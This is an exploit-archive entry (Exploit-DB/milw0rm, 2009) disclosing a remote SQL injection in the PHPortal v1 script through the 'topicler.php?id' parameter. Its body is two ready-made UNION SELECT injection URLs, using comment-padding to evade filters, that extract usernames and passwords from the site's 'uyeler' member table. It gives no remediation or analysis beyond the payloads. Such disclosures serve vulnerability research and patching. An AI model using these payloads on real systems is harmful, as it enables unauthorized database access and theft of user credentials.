PHPortal 1 - 'topicler.php?id' SQL Injection

EDB-ID:

8966




Platform:

PHP

Date:

2009-06-15


=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=
=                                 XORON 2009(C)
=
=              Phportal v1 Remote SQL Injection Vuln.      
=             
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=
= Script:   Phportal(http://phportal.mertindualari.com)
= Price:    Free
=
= Author: xoron
=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=
= BUGS   
=
=  Sql Injections:
=      /topicler.php?id=13/**/union/**/select/**/0,parola/**/from/**/uyeler/*
=      /topicler.php?id=13/**/union/**/select/**/0,kulladi/**/from/**/uyeler/*               
=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 

# milw0rm.com [2009-06-15]